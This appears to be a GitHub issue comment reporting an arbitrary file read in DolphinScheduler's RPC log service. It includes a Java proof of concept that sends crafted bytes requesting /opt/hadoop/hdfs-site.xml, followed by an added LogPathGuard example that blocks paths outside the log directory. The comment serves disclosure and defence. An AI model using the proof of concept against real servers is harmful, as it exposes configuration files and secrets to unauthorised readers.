xxjingcd commented on issue #13460:
URL:
https://github.com/apache/dolphinscheduler/issues/13460#issuecomment-1410270368
```java
public static void main(String[] args) throws InterruptedException {
    EventLoopGroup group = new NioEventLoopGroup();
    Bootstrap b = new Bootstrap();
    b.group(group)
            .channel(NioSocketChannel.class)
            .handler(new ChannelInitializer<SocketChannel>() {
                @Override
                public void initChannel(SocketChannel ch) throws Exception {
                    ChannelPipeline p = ch.pipeline();
                    p.addLast(new NettyDecoder(), new EchoMsgHandler());
                }
            });
    // Start the client.
    ChannelFuture f = b.connect("127.0.0.1", 1234).sync();
    Channel channel = f.channel();
    // access /opt/hadoop/hdfs-site.xml
    byte[] bytes = {-66, 0, 6, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 12, 123,
            34, 105, 116, 101, 109, 115, 34, 58, 123, 125, 125, 0, 0, 0, 36, 123, 34, 112,
            97, 116, 104, 34, 58, 34, 47, 111, 112, 116, 47, 104, 97, 100, 111, 111, 112,
            47, 104, 100, 102, 115, 45, 115, 105, 116, 101, 46, 120, 109, 108, 34, 125};
    ByteBuf mockAttackRequest = Unpooled.wrappedBuffer(bytes);
    channel.writeAndFlush(mockAttackRequest);
}
```
> The `bytes` array is the command to view the `/opt/hadoop/hdfs-site.xml`
file, and the `bytes` array can easily be constructed with a few lines of code.
Through the above code, you will get the `/opt/hadoop/hdfs-site.xml` file, which
is not a log file from the `Master` or `Worker`. That means a hacker can access
any file at any position.
"DS interval" can be easily broken on network communications.
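A server-side check that would refuse the request shown in the comment above, as an added example that is not part of the original comment and not DolphinScheduler's own code. `LogPathGuard`, the `logs`/`conf` directory layout and the `.log` suffix rule are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;

// Added example: LogPathGuard is a hypothetical class, not DolphinScheduler code.
public class LogPathGuard {
    private final Path logRoot;

    public LogPathGuard(Path logRoot) throws IOException {
        this.logRoot = logRoot.toRealPath(); // resolve the allowed root once
    }

    /** Returns the resolved path if it is a regular *.log file under logRoot. */
    public Path check(String requested) {
        Path real;
        try {
            // toRealPath() collapses ".." and follows symlinks before we compare.
            real = Path.of(requested).toRealPath();
        } catch (IOException | InvalidPathException | NullPointerException e) {
            throw new SecurityException("rejected: unresolvable path");
        }
        if (!real.startsWith(logRoot)) {
            throw new SecurityException("rejected: outside log directory");
        }
        if (!Files.isRegularFile(real) || !real.getFileName().toString().endsWith(".log")) {
            throw new SecurityException("rejected: not a log file");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample layout in a temp directory (not real server paths).
        Path base = Files.createTempDirectory("guard-demo");
        Path logs = Files.createDirectories(base.resolve("logs"));
        Path conf = Files.createDirectories(base.resolve("conf"));
        Files.writeString(logs.resolve("task-1.log"), "ok\n");
        Files.writeString(conf.resolve("hdfs-site.xml"), "<configuration/>\n");
        LogPathGuard guard = new LogPathGuard(logs);
        String[] requests = {logs.resolve("task-1.log").toString(),
                conf.resolve("hdfs-site.xml").toString(), logs + "/../conf/hdfs-site.xml"};
        for (String r : requests) {
            try {
                System.out.println("ALLOW " + guard.check(r));
            } catch (SecurityException e) {
                System.out.println("DENY  " + r + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

Only the first request is allowed; the absolute path to `hdfs-site.xml` and the `..` variant are both denied because the resolved path falls outside the log root.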